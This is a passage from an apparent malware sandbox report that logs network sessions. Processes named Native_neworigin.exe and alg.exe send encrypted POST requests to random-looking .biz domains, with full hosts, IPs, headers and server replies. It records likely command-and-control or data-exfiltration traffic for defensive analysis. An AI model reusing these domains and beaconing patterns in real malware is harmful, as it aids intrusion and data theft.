                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    54192.168.2.105003513.251.16.150807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.875519991 CET350OUTPOST /elpkfqto HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:57.875581026 CET834OUTData Raw: df a8 3e dc 51 b8 22 33 36 03 00 00 26 ad 8f 8e ca 7c a5 34 42 2a c4 48 2a 73 af 3c ac ea 17 4f 49 2c 9a bb bd ee ba 57 e6 0d 82 05 ba 03 27 f8 91 9f cb f5 73 7e 4b fe 99 16 cf 64 83 1e ad 47 34 5a bd 0f 22 aa 39 85 85 81 e0 34 0d 7f a9 9f eb 1a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: >Q"36&|4B*H*s<OI,W's~KdG4Z"94sV,u0-1}zB=k7ZmAN90|0]<SHwM/LN}p<z)%!pVm6gf2g|<c;_~F:t'0P7j#rjs
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.976989985 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:59 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=8b8de84560c63effbaf68631ad3719f4|8.46.123.75|1732605299|1732605299|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    55192.168.2.105003654.244.188.177806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:58.017720938 CET355OUTPOST /mvjuawquor HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:58.017738104 CET778OUTData Raw: 79 18 53 0b 98 03 fe 05 fe 02 00 00 c2 54 df 0c fa 8e e9 68 5b 5f a8 63 d2 9d 7e f4 99 f6 7d 87 c5 7c 89 9d 26 b0 b4 92 71 1b 78 e3 38 25 74 d5 dd 69 78 84 fd 7f 38 52 96 e8 53 df 78 d8 da 4d 34 84 c4 0e f3 1f d4 04 7d 1b 3a 55 5a 03 5b 56 14 61
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ySTh[_c~}|&qx8%tix8RSxM4}:UZ[Va]^dI-@;q~5&7A1f?9pz8Xfy|)|=>yh>Dd49~6|lHkdyhAbQ)eeQZ3%YAfJ
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:59.463737965 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:14:59 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=89654e70dcd545263643e4ffd751c9a8|8.46.123.75|1732605299|1732605299|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    56192.168.2.1050037208.100.26.245806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.254658937 CET344OUTPOST /y HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.254739046 CET778OUTData Raw: 44 23 7f ed cf 98 1f 53 fe 02 00 00 30 e7 38 04 89 77 78 43 ed 58 19 ed 9f 9b 6a 71 9b 5c fa 32 a1 eb 89 7f 25 69 4d a3 63 09 98 cb c0 b1 8b 3e b0 ef dd a4 a6 2c c3 00 fa f7 86 25 21 12 3a 55 6c cb 40 26 2b c2 cd cf 1f 7e cc 52 f1 53 86 7b fa 22
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: D#S08wxCXjq\2%iMc>,%!:Ul@&+~RS{"%hAR*M"0Go]`iPnt(omK2l/eY*6B0P{mD2K7=K"{sNU7>^c`s`lc}a):`e"JC3EYESF
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.423175097 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.425856113 CET356OUTPOST /sltbypkjutmqd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.425915956 CET778OUTData Raw: cc f2 de 74 57 aa e7 ff fe 02 00 00 b9 cd 3d 05 9e 5a 84 ea dc e4 f1 0e 6e 66 b1 4e ff d5 e7 08 29 d0 45 9b 8d 02 db e0 eb 83 56 e6 fc 0b 0b 16 51 d6 15 ad 98 23 a8 e2 be 44 eb 37 e7 e3 6f 66 dd 86 ef d0 2e 7a 0e 0b 8c 0e 66 1d 1e b0 7a 01 6e 69
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tW=ZnfN)EVQ#D7of.zfzniVX95TH<-VHuk%-+zXz[oa8Z3B p^q,iAxHrg'=|"!-.x(`**4PhU/D :I-AhJ]EGw>RJ
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.770710945 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    57192.168.2.105003844.221.84.105807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.276310921 CET350OUTPOST /xqvmg HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: bumxkqgxu.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:00.276422024 CET834OUTData Raw: 34 e2 42 96 2f d6 fe e4 36 03 00 00 f4 75 1b ec 6c d8 9d a8 48 cd a7 09 88 82 f2 ee e3 ee 75 f4 81 d5 60 56 4e ec 70 f6 8a fa 43 5c f1 ff b4 5f 46 7e ee ae 64 af b9 24 18 2f de 31 be 05 6c 5f 68 a8 bd fd 72 e6 fe 57 50 2e c4 52 6e b6 05 b7 9a f6
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 4B/6ulHu`VNpC\_F~d$/1l_hrWP.RnbI8<6`jj+jMc`WE:w+;Y?_ro0%fyK?0:/+EZ?"gx*7(lnB_TXpvLaZr*[[]gB
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.376210928 CET411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:01 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=3b8c66003cfd6cab4e27ec3ea1d11941|8.46.123.75|1732605301|1732605301|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    58192.168.2.105003954.244.188.177807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.682318926 CET349OUTPOST /risgh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: dwrqljrr.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:01.683294058 CET834OUTData Raw: 44 0f 84 d4 47 77 39 2f 36 03 00 00 e5 94 02 0d 36 f8 cc 17 c0 3f 8c 05 f4 b5 c8 bf b0 ea a1 68 31 81 41 be 94 7d a0 c9 78 db 2b d3 b7 61 77 b7 47 44 7f a2 46 07 e1 de 89 d4 20 f8 84 02 0f 86 6b 14 8d db 5d 94 42 21 5d b2 46 76 f1 74 82 5e c2 c4
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: DGw9/66?h1A}x+awGDF k]B!]Fvt^[iOEc2Vk/WpIhX,%u|16QN{J`Sr|rtChKz">K{it2^Xmw?}-@`8[kZkeX4c<RR[:i>^qu%_zwpJt
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.034835100 CET410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:02 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=85c59b87e4f81c3b267f08c4109150e8|8.46.123.75|1732605302|1732605302|0|1|0; path=/; domain=.dwrqljrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    59192.168.2.105004034.211.97.45806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.762713909 CET342OUTPOST /j HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:02.762759924 CET778OUTData Raw: 70 76 e1 19 38 f5 1f 72 fe 02 00 00 c7 be 52 23 a3 59 58 11 bb bc 28 1b d9 7e d8 d4 94 57 85 20 1d d6 17 78 c9 4c 40 5c 14 d6 50 dd e6 00 19 10 f3 18 b0 2d c8 2d 3c a0 27 b7 4f 24 f7 ab 36 10 64 85 ff 97 95 2c 28 b4 4b 72 18 e0 1b 9e 9f 2d fb 11
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: pv8rR#YX(~W xL@\P--<'O$6d,(Kr-guTPFs}L|V3^)u`n[iWP`{N1H^ddz/32+G3.t&z;rKiBr{R|QY27]S{n)=
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.208981991 CET407INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:03 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=bfa008cf86718dc4912b07f78da8a175|8.46.123.75|1732605303|1732605303|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    60192.168.2.105004135.164.78.200807892C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.334789991 CET354OUTPOST /fvahgnbvglin HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: nqwjmb.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:03.334789991 CET834OUTData Raw: db 75 c0 07 6f 6e fb 29 36 03 00 00 4d da 51 f8 c3 ff 24 16 32 2c 03 1f c3 f4 6d fe 15 cf 3e 28 72 79 c9 f6 5a 91 c0 a6 8d 8c 80 8d 3f b3 d8 89 48 56 1c 54 7c 5d 88 62 4a 60 87 0e ef 53 c0 97 37 da 58 2d f0 cd 07 d6 de 1b 02 37 47 7b 8b ff db 19
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: uon)6MQ$2,m>(ryZ?HVT|]bJ`S7X-7G{A1H@e\G8APdSg8]qRzo+Lwq}:S_hR;e*BD8Dussh0E$TErWjZPXs|/&PQXW5yX~wU@8
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.791903019 CET408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                                                                                    Date: Tue, 26 Nov 2024 07:15:04 GMT
                                                                                                                                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: btst=240379ab788c113c2ddde498b88a8a97|8.46.123.75|1732605304|1732605304|0|1|0; path=/; domain=.nqwjmb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                    Set-Cookie: snkz=8.46.123.75; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                    61192.168.2.105004254.244.188.177806072C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.969707012 CET357OUTPOST /xwmumuqawghep HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                    Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                    Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:15:04.969707012 CET778OUTData Raw: a1 2a 4d 1b be 9e d2 2e fe 02 00 00 ff ce e7 aa ea 7d 6e 52 95 2b 57 76 38 77 0e 08 52 c5 27 43 19 11 30 ea 58 3a 50 9f f9 26 18 aa 7b 18 f8 9e 99 db 44 2a de 2d 74 ae 99 c4 3c 22 83 89 2a 02 3f 9c eb 14 0f 6b e7 e9 8f 2f bf 23 dc a8 d4 d7 07 07
